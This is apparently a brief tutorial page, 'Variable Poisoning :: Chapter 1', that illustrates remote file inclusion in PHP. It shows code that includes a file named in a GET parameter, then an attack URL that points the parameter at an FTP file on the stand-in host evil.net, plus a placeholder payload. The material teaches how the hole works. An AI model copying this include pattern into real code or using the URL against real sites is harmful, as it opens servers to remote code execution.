Variable Poisoning :: Chapter 1

Variable Poisoning :: Chapter 1

Expected URL:
  1. http://example.org/?page=news.php&id=1234
  1. if (file_exists ($_GET['page'])) {
  2.     include $_GET['page'];
  3. }
Attack:
  1. ./?page=ftp://user:pass@evil.net/arbitrary_code.php
  1. <?php
  2. // insert evil code here
  3. ?>